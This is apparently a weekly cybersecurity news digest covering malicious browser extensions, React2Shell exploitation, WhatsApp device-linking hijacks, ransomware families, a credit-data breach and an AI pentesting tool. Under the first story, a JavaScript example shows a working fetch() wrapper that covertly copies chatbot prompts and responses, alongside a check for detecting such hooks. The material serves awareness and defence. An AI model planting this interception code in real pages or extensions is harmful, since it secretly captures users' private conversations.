I go through about 25 cybersecurity news portals and blogs every week and pull out the most interesting stories. Then I turn them into this short, digestible summary, so you can stay up to date without trying to follow 25 different sources yourself. 😱 My aim is to create a summary that gives you the gist without needing to open up the source article. But if you do want to dig deeper, all the sources covering the event are linked below each story.

If you enjoy these, come back next Monday or scroll to the bottom to subscribe to the e-mail newsletter.

1. Hidden Data Harvest in Popular “Free” “Privacy” and “Security” Extensions Exposes AI Chats of Millions

Researchers at Koi discovered that the “Featured” Urban VPN Proxy browser extension secretly intercepted every prompt and response from ChatGPT, Claude, Gemini, Copilot and other AI chatbots. Since a July 2025 update, it has exfiltrated full conversation data—including timestamps and session metadata—from more than 8 million users across Chrome and Edge, selling it via a known data broker. 

Key Details

  • Version 5.5.0 (July 9 2025) introduced silent script injection on AI chatbot pages.
  • Injected scripts override fetch() and XMLHttpRequest to capture raw API traffic.
  • All data—prompts, responses, conversation IDs, timestamps—flows to analytics.urban-vpn.com and stats.urban-vpn.com.
  • Collected information is sold for marketing analytics through BiScience, a third-party data broker.
  • Seven sister extensions from the same publisher (including 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker) share identical harvesting code.
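The fetch()/XMLHttpRequest override technique in the bullets above, shown as an added example (this is not Koi's code and not the Urban VPN extension's code). It wraps fetch so requests still go through while copies of matching request and response bodies are staged for collection, and it adds the check a defender can paste into a page's DevTools console to see whether fetch or XMLHttpRequest have been replaced by a JavaScript wrapper. The endpoint patterns, the sample prompt and the offline stand-in fetch are assumptions made for the demo.

```javascript
// Added example, not code from Koi or from the Urban VPN extension.
// Shows (1) the fetch-wrapping pattern the report describes and
// (2) a native-ness check that reveals such a wrapper. Runs under Node 18+.

const AI_ENDPOINT_PATTERNS = [
  /chatgpt\.com\/backend-api\/conversation/,   // assumed endpoint shapes, demo only
  /claude\.ai\/api\//,
];

// Harvesting pattern: wrap the real fetch so the page keeps working, and copy
// both sides of any request to a matching chatbot endpoint into `sink`.
function installHarvestingWrapper(scope, sink) {
  const original = scope.fetch;
  scope.fetch = async function fetch(input, init) {
    const url = typeof input === 'string' ? input : input.url;
    const response = await original.call(scope, input, init);
    if (AI_ENDPOINT_PATTERNS.some((re) => re.test(url))) {
      // clone() leaves the page an unread body while the wrapper reads the copy
      const text = await response.clone().text();
      sink.push({ url, request: init && init.body, response: text, ts: Date.now() });
    }
    return response;
  };
  return original;
}

// Defender check: a genuine built-in stringifies to "... { [native code] }";
// a JavaScript wrapper prints its own source instead.
function isNativeFunction(fn) {
  return typeof fn === 'function' &&
    /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Names of the network APIs in `scope` that are present but no longer native.
function findHookedApis(scope) {
  const xhr = scope.XMLHttpRequest && scope.XMLHttpRequest.prototype;
  const candidates = {
    fetch: scope.fetch,
    'XMLHttpRequest.prototype.open': xhr && xhr.open,
    'XMLHttpRequest.prototype.send': xhr && xhr.send,
  };
  return Object.entries(candidates)
    .filter(([, fn]) => typeof fn === 'function' && !isNativeFunction(fn))
    .map(([name]) => name);
}

// Offline stand-in for a browser's fetch (constructed for the demo): echoes the body back.
function makeStandInFetch() {
  const respond = (body) => ({ clone: () => respond(body), text: async () => body });
  return async (url, init) => respond(`{"reply":"echo of ${(init && init.body) || ''}"}`);
}

// Demo: one chatbot request is captured, an unrelated request is left alone.
async function demo() {
  const sink = [];
  const scope = { fetch: makeStandInFetch() };
  installHarvestingWrapper(scope, sink);
  await scope.fetch('https://chatgpt.com/backend-api/conversation', {
    method: 'POST',
    body: '{"prompt":"draft my resignation letter"}',   // constructed sample prompt
  });
  await scope.fetch('https://example.com/unrelated');
  return sink;
}
```

To check a live tab, paste `isNativeFunction` and `findHookedApis` into the DevTools console on the chatbot site and call `findHookedApis(window)`. Treat a "native" result as necessary rather than sufficient: a wrapper can also override its own `toString`, so an empty list does not prove the page is clean, while a non-empty list deserves a look at which extension injected the script.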

Next Steps

  • Uninstall Urban VPN Proxy and related extensions immediately.
  • Enforce browser extension whitelists and audit installed add-ons.
  • Monitor enterprise traffic for unauthorized calls to analytics.urban-vpn.com and stats.urban-vpn.com.

Read more at Cybersecurity News, Dark Reading, The Hacker News, CSO Online, Koi Security Blog


2. React2Shell Flaw Drives Global Backdoor and Ransomware Campaigns

The critical React2Shell vulnerability (CVE-2025-55182) has been aggressively exploited by state-linked actors and ransomware gangs to deploy Linux backdoors (KSwapDoor, ZnDoor) and Weaxor ransomware, often within minutes of the breach, while over 111,000 hosts remain unpatched. With a record ~200 public exploits enabling unauthenticated remote code execution, and follow-on activity ranging from credential theft to enabling root login, this flaw demands immediate patching and active threat hunting.

Key Details

  • At least five China-linked groups and other actors have used React2Shell to deploy seven Linux backdoors and RATs.
  • Weaxor ransomware executed within 60 seconds of initial access, disabling Defender and wiping shadow copies.
  • Attackers harvest cloud metadata tokens and run secret-discovery tools (TruffleHog, Gitleaks) for lateral movement.

Next Steps

  • Patch affected React deployments for CVE-2025-55182 and verify the fix is actually in place on every exposed host.
  • Hunt for post-exploitation activity: the named Linux backdoors, secret-scanning tools (TruffleHog, Gitleaks) run from web servers, and unexpected requests to the cloud metadata service.

Read more at The Hacker News, BleepingComputer, CyberScoop


3. GhostPairing Attack Hijacks WhatsApp Accounts via Device Linking

A new GhostPairing campaign tricks users into linking an attacker-controlled browser to their WhatsApp account by abusing the legitimate device-pairing feature, granting full and stealthy access to messages and media. The attack, first spotted in Czechia, uses familiar “found your photo” lures and fake Facebook login pages to get victims to enter pairing codes, after which the adversary can read chats and propagate the scam through the compromised account’s contacts.

Key Details

  • Campaign leverages WhatsApp’s device linking via pairing codes or QR codes.
  • Victims receive bogus Facebook‐style content previews claiming “found your photo.”
  • Attack remains invisible—no lockout—letting adversaries read history and media.
  • Compromised accounts auto‐forward the same lure to victim’s contacts.

Next Steps

  • Audit Settings → Linked Devices and remove unknown sessions.
  • Treat any out‐of‐band pairing code or QR prompt as suspicious.
  • Enable WhatsApp Two‐Step Verification for an additional PIN layer.

Read more at Cybersecurity News, Bleeping Computer, Malwarebytes


4. VolkLocker Ransomware Includes Hard-Coded Master Key, Enables Free Decryption

CyberVolk’s new VolkLocker RaaS version embeds a plaintext master key in a temporary file and never deletes it, allowing victims to decrypt their files without paying. It is a good example of how poor coding and security practices cut both ways: a ransomware author’s bug directly costs the affiliates their ransom revenue.

Key Details

  • Master key is hard-coded in the binary and backed up to %TEMP%\system_backup.key in plaintext
  • RaaS managed via Telegram; licensing costs $800–$1,100 per OS or $1,600–$2,200 for both Linux and Windows

Read more at The Hacker News, Dark Reading


5. 700Credit Data Breach Exposes Personal Data of 5.8 Million Vehicle Buyers

700Credit, a leading provider of credit checks and identity verification services for over 18,000 North American dealerships, has revealed that a compromised third-party API allowed attackers to access its web application from May through October 2025, exposing names, addresses, dates of birth and Social Security numbers of 5.8 million individuals. 

700Credit exchanges data with over 200 integration partners through APIs. One of those partners was compromised in July 2025 but did not notify 700Credit. The attackers took over that partner’s system and obtained its communication logs, which exposed an API used to pull consumer information. The breach revealed a weakness in 700Credit’s validation of API callers.

Key Details

  • Breach discovered October 25, 2025, after unusual activity in 700Dealer.com application.
  • The threat actor breached the integration partner in July 2025; the partner did not notify 700Credit, and the API remained exposed until October.
  • 5,836,521 records copied, covering data submitted by dealerships between May and October 2025.
  • 700Credit offers 12 months of complimentary credit monitoring and identity restoration services.
  • Company filed a consolidated notification with the FTC, notified state attorneys general, and reported to the FBI.

Next Steps

  • Perform a full audit of all partner APIs and enforce strict access controls.
  • Revise vendor SLAs to mandate immediate breach notification and forensic support.
  • Deploy continuous monitoring on external-facing endpoints for abnormal data access.

Read more at SecurityWeek, HackRead, Bleeping Computer


6. Gentlemen Ransomware Uses BYOVD and GPO Attacks for Double Extortion

Gentlemen ransomware, first seen in August 2025, now targets enterprises in at least 17 countries with a double extortion scheme that exfiltrates data before encrypting it.
Written in Go for cross-platform deployment, it leverages Group Policy Object tampering and “bring your own vulnerable driver” techniques to disable defenses and spread internally.

Key Details

  • Impacts sectors including healthcare, manufacturing and insurance across 17 countries.
  • Disables Windows Defender and halts Veeam, MSSQL and MongoDB services before encryption.
  • Anti-analysis check: the payload refuses to run unless a valid --password argument is supplied.
  • Selective encryption modes (--fast, --ultrafast) encrypt only 9% or 1% of each file’s content respectively, trading completeness for speed.

Next Steps

  • Review the data-exposure risk of a double-extortion incident and update mitigation plans accordingly.
  • Make sure ransomware response plans cover the exfiltration and leak-site element, not just recovery from encryption.
  • Block unauthorized driver loads: enable Microsoft’s vulnerable driver blocklist and enforce driver signing with WDAC/HVCI.
  • Alert on unexpected Group Policy Object modifications, since GPO tampering is how this family disables defenses at scale.

Read more at Cybersecurity News


7. GhostPoster Steganography Attack Hides Malware in Firefox Extension Icons

Researchers at Koi Security have uncovered a steganography-based campaign dubbed GhostPoster that hides malicious JavaScript payloads inside PNG icons of at least 17 Firefox extensions installed over 50,000 times. 

Key Details

  • The loader searches the icon’s raw bytes for a hidden marker (===); everything after that marker is treated as JavaScript and executed. Because the code never appears in the extension’s source, store scanners and code reviewers do not see it.
  • The payload waits 48 hours between C2 check-ins.
  • It activates only 10% of the time and not until 6+ days after install, a delay designed to outlast sandbox analysis.
  • Once active, it disables Content-Security-Policy headers, injects iframes, tracks users and hijacks affiliate commissions.

Next Steps

  • Audit and remove untrusted Firefox extensions immediately.
  • Block C&C domains (e.g., liveupdt[.]com) at the network level.
  • Enforce extension whitelisting and strict Content-Security-Policy across endpoints.

Read more at Koi Security Blog, Cybersecurity News, SecurityWeek


8. Shannon: Autonomous AI Pentesting Tool Validates Code Vulnerabilities with Real Exploits

Shannon is a fully autonomous AI-powered penetration tester for web applications that performs white-box code analysis and executes live browser exploits to confirm real vulnerabilities rather than just flagging potential issues.  
It achieved a 96.15% success rate on the XBOW benchmark—surpassing human pentesters—and delivers reproducible proofs-of-concept in reports.

Key Details

  • 96.15% success rate on XBOW benchmark vs. 85% for humans and proprietary systems
  • Confirmed OWASP-critical flaws: injection, XSS, SSRF, broken authentication/authorization
  • Discoveries: 20+ critical issues in OWASP Juice Shop; 15 in c{api}tal API with injection chaining and bypasses
  • Typical run duration 1–1.5 hours at an estimated cost of ~$50 per test

Next Steps

  • Consider integrating Shannon into CI/CD pipelines against non-production environments only
  • Evaluate the AGPL-3.0 Lite edition for internal proof-of-concept tests

Read more at Cybersecurity News, GitHub


Subscribe

Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.
